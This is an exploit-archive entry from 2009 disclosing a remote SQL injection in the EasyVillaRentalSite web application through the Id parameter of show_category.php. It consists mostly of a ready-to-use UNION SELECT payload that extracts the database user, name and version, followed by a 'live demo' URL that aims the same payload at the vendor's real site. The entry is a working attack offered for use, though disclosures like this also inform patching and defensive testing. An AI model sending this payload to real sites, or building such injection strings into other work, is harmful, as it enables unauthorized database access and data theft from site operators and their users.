id: 5464
date: 07/08/2009
title: EasyVillaRentalSite (Id) Remote SQL Injection Vulnerability
author: BazOka-HaCkEr
cves: 

===========================================================
EasyVillaRentalSite (Id) Remote SQL Injection Vulnerability
===========================================================


========================================================

==> EasyVillaRentalSite (id) Remote SQL Injection Vulnerability

========================================================

==> AuThOr : BazOka-HaCkEr

========================================================

==> Product Page :

==> http://easyvillarentalsite.com

==> ExplO!te :

==> show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
 
==> L!ve D3mo :

==> http://easyvillarentalsite.com/demo/show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--

=========================================================



#  0day.today [2023-03-22]  #